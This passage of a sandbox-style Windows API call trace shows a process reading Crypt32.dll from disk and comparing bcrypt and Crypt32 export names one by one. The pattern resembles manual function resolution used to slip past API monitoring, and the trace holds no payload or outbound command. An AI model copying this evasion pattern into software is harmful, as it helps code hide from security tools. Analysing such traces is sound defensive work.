lpString2="BCryptCreateMultiHash") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0102.998] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0102.999] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0102.999] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0102.999] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0102.999] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0102.999] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0103.000] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0103.001] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0103.002] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0103.003] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0103.003] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0103.003] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0103.003] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0103.003] GetProcessHeap () returned 0x5b0000 [0103.004] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d22010 | out: hHeap=0x5b0000) returned 1 [0103.004] GetProcessHeap () returned 0x5b0000 [0103.004] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c9200 [0103.005] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0103.013] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0103.013] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0103.013] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0103.013] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0103.013] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0103.013] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0103.013] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0103.014] GetProcessHeap () returned 0x5b0000 [0103.014] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1c30e0) returned 0x40e4040 [0103.018] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0103.018] ReadFile (in: hFile=0x160, lpBuffer=0x40e4040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40e4040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0103.345] CloseHandle (hObject=0x160) returned 1 [0103.346] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0103.346] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0103.346] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0103.346] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0103.346] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0103.346] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0103.346] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0103.346] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0103.346] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0103.346] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0103.346] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0103.346] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0103.346] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0103.346] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0103.346] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0103.346] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0103.346] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0103.346] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0103.346] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0103.346] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0103.346] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0103.346] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0103.347] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0103.347] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0103.347] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.348] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.349] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0103.349] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0103.350] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0103.350] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0103.350] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0103.350] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", 